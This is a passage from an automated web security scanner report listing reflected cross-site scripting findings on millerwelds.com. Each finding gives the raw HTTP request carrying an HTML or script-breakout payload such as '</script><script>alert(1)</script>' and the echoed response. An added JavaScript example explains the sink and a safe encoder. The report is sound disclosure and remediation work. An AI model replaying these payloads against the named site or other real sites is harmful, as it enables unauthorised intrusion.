P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="sh" name="sh" value="259df"style="x:expression(alert(1))"db2e7570dde759634">
...[SNIP]...

4.118. http://www.millerwelds.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 635e6"><a>104a9df6ec2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about635e6"><a>104a9df6ec2/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:22 GMT
Connection: Keep-Alive
Content-Length: 29434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonabout635e6"><a>104a9df6ec2">
...[SNIP]...

4.119. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f4a"><a>95607ef0d6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about95f4a"><a>95607ef0d6f/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:13 GMT
Connection: Keep-Alive
Content-Length: 29434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonabout95f4a"><a>95607ef0d6f">
...[SNIP]...

4.120. http://www.millerwelds.com/financing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc78e"><a>876a87a77f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /financingdc78e"><a>876a87a77f1/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:02 GMT
Connection: Keep-Alive
Content-Length: 29438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonfinancingdc78e"><a>876a87a77f1">
...[SNIP]...

4.121. http://www.millerwelds.com/financing/ [int_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcbf7</script><script>alert(1)</script>d68cbe19e50 was submitted in the int_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerlinedcbf7</script><script>alert(1)</script>d68cbe19e50 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:07 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-321856-3");
pageTracker._setCustomVar(1,"Internal%20Campaign","powerlinedcbf7</script><script>alert(1)</script>d68cbe19e50",1);pageTracker._setCustomVar(2,"Internal%20Source","/products/accessories/international/",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad",1);pageTracker._setCustomVar(4,"Internal%20Cont
...[SNIP]...

4.122. http://www.millerwelds.com/financing/ [int_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_content request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1001</script><script>alert(1)</script>f6ba1b55bb7 was submitted in the int_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspaceb1001</script><script>alert(1)</script>f6ba1b55bb7&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:50 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
._setCustomVar(2,"Internal%20Source","/products/accessories/international/",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad",1);pageTracker._setCustomVar(4,"Internal%20Content","blackspaceb1001</script><script>alert(1)</script>f6ba1b55bb7",1);pageTracker._initData();
pageTracker._trackPageview();
</script>
...[SNIP]...
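The following is an added example, not code from the report or from millerwelds.com. It mirrors the inline-script sink shown in the 4.122 response (the tracker call and the int_content value are the report's; the helper names are made up here) and shows, with a small model of the HTML tokenizer's script-data state, why the payload breaks out of the double-quoted string without containing a single quote character, why quote-escaping and JSON.stringify both fail, and what a sufficient encoder looks like.

```javascript
// Added example: models the 4.122 sink, not the site's real template code.
const PAYLOAD = 'blackspaceb1001</script><script>alert(1)</script>f6ba1b55bb7'; // from the report

// Vulnerable: interpolates the parameter with no encoding, as the response shows.
function renderTrackerUnsafe(content) {
  return '<script>pageTracker._setCustomVar(4,"Internal%20Content","' + content + '",1);</script>';
}

// Half-fix many templates use: escape backslash and double quote so the JS
// string cannot be closed early. The report's payload contains neither.
function escapeQuotesOnly(s) {
  return String(s).replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// JSON.stringify escapes quotes, backslashes and U+2028/2029, but not '<' or '/',
// so "</script>" survives it unchanged.
function renderWithJsonStringify(content) {
  return '<script>var intContent=' + JSON.stringify(content) + ';</script>';
}

// Sufficient: \uXXXX-encode every character outside a small allowlist. This
// removes < > / & and both quote characters, so neither "</script>" nor a
// string delimiter can appear in the output; U+2028/2029, which terminate a
// JS string literal, are covered too. The regex has no 'u' flag, so each
// UTF-16 code unit is escaped on its own, which is valid in JS and JSON.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, ch =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderTrackerSafe(content) {
  return '<script>pageTracker._setCustomVar(4,"Internal%20Content","' +
    encodeForJsString(content) + '",1);</script>';
}

// Minimal model of the HTML tokenizer's "script data" state: once inside
// <script>, the only thing that ends the element is "</script" followed by
// whitespace, "/" or ">", case-insensitively. JavaScript syntax (quotes,
// backslashes) is invisible at this stage. Returns the body of each script
// element found, in document order.
function extractInlineScripts(html) {
  const scripts = [];
  const open = /<script\b[^>]*>/gi;
  let m;
  while ((m = open.exec(html)) !== null) {
    const start = m.index + m[0].length;
    const close = /<\/script[\s\/>]/gi;
    close.lastIndex = start;
    const c = close.exec(html);
    const end = c ? c.index : html.length;
    scripts.push(html.slice(start, end));
    open.lastIndex = c ? c.index + c[0].length : html.length;
  }
  return scripts;
}

// Stand-alone demonstration.
console.log('unsafe   :', extractInlineScripts(renderTrackerUnsafe(PAYLOAD)));
console.log('json     :', extractInlineScripts(renderWithJsonStringify(PAYLOAD)));
console.log('safe     :', extractInlineScripts(renderTrackerSafe(PAYLOAD)));
console.log('roundtrip:', JSON.parse('"' + encodeForJsString(PAYLOAD) + '"') === PAYLOAD);
```

The unsafe and JSON.stringify renderings both yield two script elements, the second being alert(1); the encoded rendering yields one, and the encoded literal still decodes to the original value, so the tracker receives exactly what was sent while the HTML parser never sees an end tag.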

4.123. http://www.millerwelds.com/financing/ [int_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_medium request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 119bd</script><script>alert(1)</script>4e4bb2b4230 was submitted in the int_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad119bd</script><script>alert(1)</script>4e4bb2b4230&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:32 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
._setCustomVar(1,"Internal%20Campaign","powerline",1);pageTracker._setCustomVar(2,"Internal%20Source","/products/accessories/international/",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad119bd</script><script>alert(1)</script>4e4bb2b4230",1);pageTracker._setCustomVar(4,"Internal%20Content","blackspace",1);pageTracker._initData();
pageTracker._trackPageview();
</script>
...[SNIP]...

4.124. http://www.millerwelds.com/financing/ [int_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/

Issue detail

The value of the int_source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4758a</script><script>alert(1)</script>57d87b0905b was submitted in the int_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financing/?int_source=/products/accessories/international/4758a</script><script>alert(1)</script>57d87b0905b&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:16 GMT
Connection: Keep-Alive
Content-Length: 15853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
var pageTracker = _gat._getTracker("UA-321856-3");
pageTracker._setCustomVar(1,"Internal%20Campaign","powerline",1);pageTracker._setCustomVar(2,"Internal%20Source","/products/accessories/international/4758a</script><script>alert(1)</script>57d87b0905b",1);pageTracker._setCustomVar(3,"Internal%20Medium","bannerad",1);pageTracker._setCustomVar(4,"Internal%20Content","blackspace",1);pageTracker._initData();
pageTracker._trackPageview();
</script>
...[SNIP]...

4.125. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The value of REST URL parameter 1 (the first path segment, here images) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1634a"><a>9d07cc5b4c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response, which is the site's 404 page: its navigation markup builds the id of a <ul> from the first path segment (navon followed by the segment), so any request whose first segment does not exist reflects that segment into the attribute.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. Because both the double quote and the closing angle bracket reach the page unencoded, the payload terminates the id attribute and the <ul> start tag, and everything after it is parsed as new markup. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place, for example whether the server rejects path segments containing particular characters or strings before the 404 handler runs. Findings 4.126 to 4.135 below are the same sink reached through different first path segments, so a single fix in the 404 template (encode the segment for an HTML attribute, or better, map it against the list of known sections and fall back to a fixed id) covers all of them.

Request

GET /images1634a"><a>9d07cc5b4c4/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:29:50 GMT
Connection: Keep-Alive
Content-Length: 29435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimages1634a"><a>9d07cc5b4c4">
...[SNIP]...

4.126. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a5a"><a>0d7e05e3945 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images25a5a"><a>0d7e05e3945/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:29:50 GMT
Connection: Keep-Alive
Content-Length: 29435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimages25a5a"><a>0d7e05e3945">
...[SNIP]...

4.127. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c15db"><a>0a0ab305ada was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesc15db"><a>0a0ab305ada/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:29:54 GMT
Connection: Keep-Alive
Content-Length: 29435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimagesc15db"><a>0a0ab305ada">
...[SNIP]...

4.128. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d5d"><a>5d463450d54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /landingf0d5d"><a>5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 16:43:21 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 29436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonlandingf0d5d"><a>5d463450d54">
...[SNIP]...

4.129. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 391ef"><a>ac7df67acbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pdf391ef"><a>ac7df67acbf/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
